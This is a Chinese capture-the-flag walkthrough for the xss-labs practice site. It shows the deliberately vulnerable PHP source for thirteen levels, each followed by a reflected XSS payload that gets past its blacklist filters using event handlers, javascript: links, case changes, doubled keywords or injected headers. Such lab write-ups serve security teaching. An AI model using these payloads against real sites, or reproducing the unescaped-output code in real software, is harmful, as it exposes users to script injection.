xss-labs1

http://test.ctf8.com/

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

$str被放入到了 h2标签中，只需要把前面h2标签闭合构造payload，

name=</h2><script>alert(111)</script>

2. <?php 
   ini_set("display_errors", 0);
   $str = $_GET["keyword"];
   echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
   <form action=level2.php method=GET>
   <input name=keyword  value="'.$str.'">
   <input type=submit name=submit value="搜索"/>
   </form>
   </center>';
   ?>

闭合value

keyword=test"><script>alert(2)</script>

3. <?php 
   ini_set("display_errors", 0);
   $str = $_GET["keyword"];
   echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
   <form action=level3.php method=GET>
   <input name=keyword  value='".htmlspecialchars($str)."'>
   <input type=submit name=submit value=搜索 />
   </form>
   </center>";

与上一题相比，这里使用了 htmlspecialchars()函数，他会把<和>转译为html实体

查看源码可以发现<和>都被转译掉了，所以在这里可以考虑使用on一类的事件弹xss

keyword='onclick=alert(3)// 闭合前面的value 注释掉后面的单引号

4. <?php 
   ini_set("display_errors", 0);
   $str = $_GET["keyword"];
   $str2=str_replace(">","",$str);
   $str3=str_replace("<","",$str2);
   echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
   <form action=level4.php method=GET>
   <input name=keyword  value="'.$str3.'">
   <input type=submit name=submit value=搜索 />
   </form>
   </center>';
   ?>

   和上一个差不多，只不过是用双引号闭合

keyword="oninput=alert(4)//

5. <?php 
   ini_set("display_errors", 0);
   $str = strtolower($_GET["keyword"]);
   $str2=str_replace("<script","<scr_ipt",$str);
   $str3=str_replace("on","o_n",$str2);
   echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
   <form action=level5.php method=GET>
   <input name=keyword  value="'.$str3.'">
   <input type=submit name=submit value=搜索 />
   </form>
   </center>';

这次是把<script 和 on 都给替换了，所以考虑a href 来触发

123"><a href=javascript:alert(1) >XSS</a>

6. <?php 
   ini_set("display_errors", 0);
   $str = $_GET["keyword"];
   $str2=str_replace("<script","<scr_ipt",$str);
   $str3=str_replace("on","o_n",$str2);
   $str4=str_replace("src","sr_c",$str3);
   $str5=str_replace("data","da_ta",$str4);
   $str6=str_replace("href","hr_ef",$str5);
   echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
   <form action=level6.php method=GET>
   <input name=keyword  value="'.$str6.'">
   <input type=submit name=submit value=搜索 />
   </form>
   </center>';

虽然把href给改了 但可以考虑变化大小写

123"><a hREf=javascript:alert(1) >XSS</a>

7. <?php 
   ini_set("display_errors", 0);
   $str = $_GET["keyword"];
   $str2=str_replace("<script","<scr_ipt",$str);
   $str3=str_replace("on","o_n",$str2);
   $str4=str_replace("src","sr_c",$str3);
   $str5=str_replace("data","da_ta",$str4);
   $str6=str_replace("href","hr_ef",$str5);
   echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
   <form action=level6.php method=GET>
   <input name=keyword  value="'.$str6.'">
   <input type=submit name=submit value=搜索 />
   </form>
   </center>';

   123"><scriscriptpt>alert(7)</scrscriptipt>//

123"oonnclick=alert(7) //

8. <?php 
   ini_set("display_errors", 0);
   $str = strtolower($_GET["keyword"]);
   $str2=str_replace("script","scr_ipt",$str);
   $str3=str_replace("on","o_n",$str2);
   $str4=str_replace("src","sr_c",$str3);
   $str5=str_replace("data","da_ta",$str4);
   $str6=str_replace("href","hr_ef",$str5);
   $str7=str_replace('"','&quot',$str6);
   echo '<center>
   <form action=level8.php method=GET>
   <input name=keyword  value="'.htmlspecialchars($str).'">
   <input type=submit name=submit value=添加友情链接 />
   </form>
   </center>';
   ?>
   <?php
    echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
   ?>

javascript:alert(1)//或者

javascr%09ipt:alert(1) %09对关键字隔断 然后进行实体编码javascript:alert(1)

9. <?php 
   ini_set("display_errors", 0);
   $str = strtolower($_GET["keyword"]);
   $str2=str_replace("script","scr_ipt",$str);
   $str3=str_replace("on","o_n",$str2);
   $str4=str_replace("src","sr_c",$str3);
   $str5=str_replace("data","da_ta",$str4);
   $str6=str_replace("href","hr_ef",$str5);
   $str7=str_replace('"','&quot',$str6);
   echo '<center>
   <form action=level9.php method=GET>
   <input name=keyword  value="'.htmlspecialchars($str).'">
   <input type=submit name=submit value=添加友情链接 />
   </form>
   </center>';
   ?>
   <?php
   if(false===strpos($str7,'http://'))
   {
     echo '<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>';
           }
   else
   {
     echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
   }
   ?>

   与上一关相比多了一个url检测,如果没有带http://就会报错

javascript:alert(1)//http://test.com//

10

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这一题的keyword参数不需要管,只需要控制t_sort

t_sort=" onclick='alert(1)' type="text">//

11. <?php 
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_SERVER['HTTP_REFERER'];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_ref"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?> 

    使用burp修改referer

1" type="text" onclick=alert(1)//

12. <?php 
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_SERVER['HTTP_USER_AGENT'];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_ua"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

    和上一关一样，只不过就改UA

13

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

改cookie